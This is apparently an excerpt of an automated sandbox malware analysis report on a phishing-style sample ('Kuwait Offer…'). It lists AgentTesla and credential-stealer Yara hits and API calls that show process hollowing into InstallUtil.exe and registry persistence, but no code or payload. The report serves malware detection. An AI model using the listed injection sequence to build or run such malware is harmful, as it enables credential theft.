                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:9
                                        Start time:02:56:20
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x900000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2575392389.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:13.2%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:6.2%
                                          Total number of Nodes:306
                                          Total number of Limit Nodes:10

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2
                                          • API String ID: 0-450215437
                                          • Opcode ID: 5b5c063f5f97c9253ead83be0ad1d2481e2e292a0ca413475e0a7c48bb5e6d90
                                          • Instruction ID: 56eb1c47c8c8b4e87efe2a0c59518ac02a4231b9434d4b6dfae8e1062d3d4a9b
                                          • Opcode Fuzzy Hash: 5b5c063f5f97c9253ead83be0ad1d2481e2e292a0ca413475e0a7c48bb5e6d90
                                          • Instruction Fuzzy Hash: 04C2AEB4E01229CFDB65DF68C884B99B7B6FB89304F1081E9D909AB355DB349E85CF40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: e8d194de0e5245ca929d792df6c198a7c9899a5f64224ee06fff8d7cf8d0c5c2
                                          • Instruction ID: bc130880e77fc4a07d0616d787b8e65d8392d36540af87619c999a7e408a8a43
                                          • Opcode Fuzzy Hash: e8d194de0e5245ca929d792df6c198a7c9899a5f64224ee06fff8d7cf8d0c5c2
                                          • Instruction Fuzzy Hash: 6AA2E434A00228DFDB54DF95C994BADB7B6FF48700F1581A9E506AB3A5CB70AC85CF90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8
                                          • API String ID: 0-4194326291
                                          • Opcode ID: 3ecda558afe6e67a682ac6b326494456d4a6f0b88e5d7e1a44c1001a9bbf307b
                                          • Instruction ID: dbed2d0ed787b449dbe7549aba3c9e0bb66ccb2b59715629ef425808a5f611c1
                                          • Opcode Fuzzy Hash: 3ecda558afe6e67a682ac6b326494456d4a6f0b88e5d7e1a44c1001a9bbf307b
                                          • Instruction Fuzzy Hash: 6542C271D016298FDB64DF69C850AD9FBB2BF89310F1486EAD50DA7250DB30AE85CF90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4
                                          • API String ID: 0-4088798008
                                          • Opcode ID: 6d8fcd79c7b0b901b6a461be8e46b6344c70309f6dd8f5546906b0fc065ac6bf
                                          • Instruction ID: a6b43690da7125e2f6c3fe021a3aacd363783976457ac76b40f35a37fb4cfe20
                                          • Opcode Fuzzy Hash: 6d8fcd79c7b0b901b6a461be8e46b6344c70309f6dd8f5546906b0fc065ac6bf
                                          • Instruction Fuzzy Hash: 3422E934A00229CFDB64DFA4C994BADB7B6FF48304F1481A9D50AAB3A5DB709D85CF50
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0634D69D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0634D69D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0634EB1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 0634EB1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: h
                                          • API String ID: 0-2439710439

                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0634E067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: ab85988958fc1a0dc3fd71212b1d0bb9a6f965fe324ebc56fa154403fe9d77b8
                                          • Instruction ID: 3341790235e7fb4a746726ab1af6426d8d7a75e72bebb27fdaff1f435b1aadeb
                                          • Opcode Fuzzy Hash: ab85988958fc1a0dc3fd71212b1d0bb9a6f965fe324ebc56fa154403fe9d77b8
                                          • Instruction Fuzzy Hash: 42A10274E002188FDB60DFA9C885BEEFBF1BF49300F149169E858A7240DB749985CF85

                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0634E067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 815fe338abacf813f277d4b5b9724b9c975db01c1ffaa108dd159be4ea9700c4
                                          • Instruction ID: 07f5df1970d070fb72537e63868f2256a59fc2cfcf6a5bef4d6b0b3ba0da8e9c
                                          • Opcode Fuzzy Hash: 815fe338abacf813f277d4b5b9724b9c975db01c1ffaa108dd159be4ea9700c4
                                          • Instruction Fuzzy Hash: 1FA1F074E002188FDB60DFA9C8857EEFBF1BF49300F14916AE858A7240DB749985CF85

                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06620863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: eabc8c761fdd6f02847927212d4ec58bc83c519d8cb388fe5f748473ffef0b60
                                          • Instruction ID: 821860dbd169efb335b4864f1b1d0cc29639b654160df31dfa4a14fa6332c467
                                          • Opcode Fuzzy Hash: eabc8c761fdd6f02847927212d4ec58bc83c519d8cb388fe5f748473ffef0b60
                                          • Instruction Fuzzy Hash: 706125B4D007199FEF50CFA9C8457EEBBB1FB09310F148129E815A7281DB789985CF81

                                          APIs
                                          • CopyFileA.KERNEL32(?,?,?), ref: 06620863
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: a8d27fb90943ef9bc118781463a634428bb6953abb75a018e7f6534d50fb3912
                                          • Instruction ID: 76d34ace0cb1dc257a28daad2ac8e62e539f832a5100b5c5708833542daeb2d9
                                          • Opcode Fuzzy Hash: a8d27fb90943ef9bc118781463a634428bb6953abb75a018e7f6534d50fb3912
                                          • Instruction Fuzzy Hash: D46103B4D007299FEF50CFA9C8457EEBBB1BB09310F148529E855A7281D7789985CF80

                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 06620D28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: 7c478d1f92f483b0134122d6117e09e9c84b7ae3c08d36b7b4e8c912fe472433
                                          • Instruction ID: e563833edf704fd4dce9a3764ad606bda9d2b1c9055c738c5d0b805b17020e74
                                          • Opcode Fuzzy Hash: 7c478d1f92f483b0134122d6117e09e9c84b7ae3c08d36b7b4e8c912fe472433
                                          • Instruction Fuzzy Hash: 7251D0B4D007199FDF54CFA9C885B9EBBB1FF09300F149429E818AB251DB749985CF54

                                          APIs
                                          • RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 06620D28
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Value
                                          • String ID:
                                          • API String ID: 3702945584-0
                                          • Opcode ID: b614a0230ed747f3029fc6d787146a7dedf9d745270bd533e888ac7e80b6a84d
                                          • Instruction ID: 2b9e02908c84f23ff186ce9cafe29bb03b7ba9ce29795f71d1f5772aac82d6b7
                                          • Opcode Fuzzy Hash: b614a0230ed747f3029fc6d787146a7dedf9d745270bd533e888ac7e80b6a84d
                                          • Instruction Fuzzy Hash: 3D51CEB4D007199FDF54CFA9C885BAEBBB1FF09300F14942AE818AB251DB749985CF54

                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06620AB8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: d69d54af65757fdbc3b2854c606140c24ad15d7165475c04fcf2493a805fcedb
                                          • Instruction ID: 4f88b62b20ea6abb494e91012397a01fb3f1f48509c6530ee90062e9f491ab6b
                                          • Opcode Fuzzy Hash: d69d54af65757fdbc3b2854c606140c24ad15d7165475c04fcf2493a805fcedb
                                          • Instruction Fuzzy Hash: 0151FEB4D003199FDF60CFA9D981B9EBBB1FB09300F209029E818A7241DB759981CF95
                                          APIs
                                          • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 06620AB8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366605467.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6620000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: fd36ca9b1ca0e49b10bdc9e1a281638cadfb9cd7d85a5ead8c8b53f0a50203ce
                                          • Instruction ID: 408c0f216b4bdb61e8bc1433c8ddb8a16d4a376c3e4779123c0fd50a6bf1cd8a
                                          • Opcode Fuzzy Hash: fd36ca9b1ca0e49b10bdc9e1a281638cadfb9cd7d85a5ead8c8b53f0a50203ce
                                          • Instruction Fuzzy Hash: 4651DDB4D003199FDF54CFA9D981B9EBBB1FF09300F20902AE818AB251DB759985CF45
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0634E94B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 709fdac8a21dbd5c256f5a2cc8fb2ec8e74408ba9b1871b3839fe48387b26aeb
                                          • Instruction ID: 51b21646ae7f35d54d293d735812a5b51e57f7c297d829c004f211553a1ec1f5
                                          • Opcode Fuzzy Hash: 709fdac8a21dbd5c256f5a2cc8fb2ec8e74408ba9b1871b3839fe48387b26aeb
                                          • Instruction Fuzzy Hash: 8B41CCB5D012589FCF00CFA9D980AEEFBF1BB49310F14902AE818B7240C375A945CFA4
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0634E94B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 5f365db7886b6bb5fa989ebe53300adccf8aaef456ec6d0ce821367b68cc2458
                                          • Instruction ID: 19ff90c2d4f267889b6b5e8714c9b89d719bfbc487edb7456dc5d4917c1e1c73
                                          • Opcode Fuzzy Hash: 5f365db7886b6bb5fa989ebe53300adccf8aaef456ec6d0ce821367b68cc2458
                                          • Instruction Fuzzy Hash: 8441BAB5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE818B7250D379AA45CF54
                                          APIs
                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0634E7C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: d921db9ab7e241d7b9671abbcc6e8b4ee55d19904d26e1493c4c81f85d0b5244
                                          • Instruction ID: 49fc65281edcdcb9992d7e0672e6a1cf0f2dd71fe04c229eff68c5493e40db0c
                                          • Opcode Fuzzy Hash: d921db9ab7e241d7b9671abbcc6e8b4ee55d19904d26e1493c4c81f85d0b5244
                                          • Instruction Fuzzy Hash: D631ACB9D04258EFCF10CFA9D884ADEFBB5BB09310F10942AE815B7210D775A946CF94
                                          APIs
                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0634E7C2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 5f551d053f34c60a58f122a7173d40a1b626b9260e1360fa5401644535eb70d3
                                          • Instruction ID: 2c9ecce01e0f4fd33844a1c2f33a81fe9fc6660649b63fc3881d00b835f0295e
                                          • Opcode Fuzzy Hash: 5f551d053f34c60a58f122a7173d40a1b626b9260e1360fa5401644535eb70d3
                                          • Instruction Fuzzy Hash: C531A8B8D04258DFCF10CFA9D880ADEFBB5BB09310F10942AE815B7210D775A946CF94
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0634EE0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 0d8ae5f9a2f7485392490abd6d988d4abac476f2849899caaf92a975b3d9f5a4
                                          • Instruction ID: 5dc5f35e72f4729e14cdb794bebf304f5ec0d152de2a63f98897d5f183cc6be5
                                          • Opcode Fuzzy Hash: 0d8ae5f9a2f7485392490abd6d988d4abac476f2849899caaf92a975b3d9f5a4
                                          • Instruction Fuzzy Hash: F431DAB8D012589FCF10CFA9D884AEEFBB0BB09310F14902AE814B7210D775A985CFA4
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0634E267
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 33f159d96b18c164b62a708118f70c4b80186c0c054449dd91207a86eb9109c2
                                          • Instruction ID: 7576ec0f13379a5942a5c3db1a239c81ce38ba2fbd4be14a287374780097013d
                                          • Opcode Fuzzy Hash: 33f159d96b18c164b62a708118f70c4b80186c0c054449dd91207a86eb9109c2
                                          • Instruction Fuzzy Hash: 3041EDB4D012589FDB10DFA9D884AEEFBF5BF49310F14802AE419B7240D778A985CFA4
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 062E04BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 0fc40d3ec8959906d87f40d9de9afa6ec5c04ac444b45fdf81e052554d777f98
                                          • Instruction ID: a14d7b05933831a67cce272d29830845d29483d908193f4652aad957048e6130
                                          • Opcode Fuzzy Hash: 0fc40d3ec8959906d87f40d9de9afa6ec5c04ac444b45fdf81e052554d777f98
                                          • Instruction Fuzzy Hash: 083197B8D00248AFCF10CFA9D984A9EFBB1BF49310F14942AE815BB250D775A946CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d
                                          • API String ID: 0-2564639436
                                          • Opcode ID: cf35dd341efaacae79122136a9ff9a8a008d878c5741156b8499d399c788c127
                                          • Instruction ID: 1e045177b33856bd62da8476eda6d361a7dfc07c54970ff5b7da43f7f575be48
                                          • Opcode Fuzzy Hash: cf35dd341efaacae79122136a9ff9a8a008d878c5741156b8499d399c788c127
                                          • Instruction Fuzzy Hash: 82D17B34600616CFCB14CF28C494A6AB7F6FF88314B65C969D45A8B761DB30FC46CB90
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0634EE0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: bc8e4036a3662f7c2d025a7329348bf27b00d2ef43ee2873af9bc60e27925d6a
                                          • Instruction ID: 0c7465d90640b2cecc1d780c88b84f26bbf85f6c3511e365dcdd1e37eec477f0
                                          • Opcode Fuzzy Hash: bc8e4036a3662f7c2d025a7329348bf27b00d2ef43ee2873af9bc60e27925d6a
                                          • Instruction Fuzzy Hash: 7631C8B8D002589FCF10CFAAD884AEEFBF0BB09310F14942AE814B7210D775A985CF94
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 062E04BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 5c0d2237eb78cee83ee72f0610d94394df3d14b6e3c04e312e4875cebff3963b
                                          • Instruction ID: 1f061ac00e47564047cc6d64d1c622656ea00c34925c253e9873fe8b32d10400
                                          • Opcode Fuzzy Hash: 5c0d2237eb78cee83ee72f0610d94394df3d14b6e3c04e312e4875cebff3963b
                                          • Instruction Fuzzy Hash: 9C31A7B8D002089FCF10CFA9D980AAEFBB0BB49310F14942AE819B7210D775A946CF94
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0634E267
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365640294.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6340000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 44ccefcd684aee18ead37bff670cefa7daa271208dbc929af546251dac7a0dc1
                                          • Instruction ID: 78426e0d07d3cced2fe8f007578da7f962792cf316f1de79ffce556ffabd220f
                                          • Opcode Fuzzy Hash: 44ccefcd684aee18ead37bff670cefa7daa271208dbc929af546251dac7a0dc1
                                          • Instruction Fuzzy Hash: 7131BBB4D012589FDB14DFAAD884AEEFBF1BB49310F14802AE418B7240D779A945CF94
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062E167F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 2e1e42924026c1ccb10f0a4a9b0ba7e016583b29e6bc20aadfdabf72bbb2ca6e
                                          • Instruction ID: 0155a9b29f9867bd3765c4c97b338998afc9a934d16717d9682d5ad09e811227
                                          • Opcode Fuzzy Hash: 2e1e42924026c1ccb10f0a4a9b0ba7e016583b29e6bc20aadfdabf72bbb2ca6e
                                          • Instruction Fuzzy Hash: 8D31C8B8D002089FDF14CFA9D884AEEFBB0AF49310F14942AE815B7210C775A945CF94
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062E167F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365320548.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_62e0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 9867f2e22252c14227c5d5f984267c013dadcb7fbb22a00bfa052fbc23322e38
                                          • Instruction ID: 6ebbf061193b046f687f9ceb32353d26a5bcf9b354bce26b2ce03ebbc7e78373
                                          • Opcode Fuzzy Hash: 9867f2e22252c14227c5d5f984267c013dadcb7fbb22a00bfa052fbc23322e38
                                          • Instruction Fuzzy Hash: 463198B8D012489FDF14CFA9D884AEEFBB1AF49310F14942AE815B7210D775A945CF94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: e
                                          • API String ID: 0-4024072794
                                          • Opcode ID: 13a15da96c7745b36c74bd39c7981e400c33eb5d3ae723c10fb824dc298c973b
                                          • Instruction ID: 56875ac73f153e64494e9148c8adb8c636050a1c840d9016dde648f68a170037
                                          • Opcode Fuzzy Hash: 13a15da96c7745b36c74bd39c7981e400c33eb5d3ae723c10fb824dc298c973b
                                          • Instruction Fuzzy Hash: C121D374904259CFDBA5DF24CC88B99BBB6BF49300F4141E9E40AA7650EB309E84CF41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: N
                                          • API String ID: 0-1130791706
                                          • Opcode ID: b9d80689b3c2fe1cca153ae3e62dd23c4d5ec9b8c471b4f392b8d5c4cc06af8a
                                          • Instruction ID: 6649b0126cc8d2fc09365005308a9227f5be5d9b3e22cc4a9ed43792b3d7b5be
                                          • Opcode Fuzzy Hash: b9d80689b3c2fe1cca153ae3e62dd23c4d5ec9b8c471b4f392b8d5c4cc06af8a
                                          • Instruction Fuzzy Hash: 4E015B74D0026ACFE7649F54C848BE9B2B5EB44308F0088E8D11AA3680DBB40EC58F50
                                          Strings
                                          Memory Dump Source
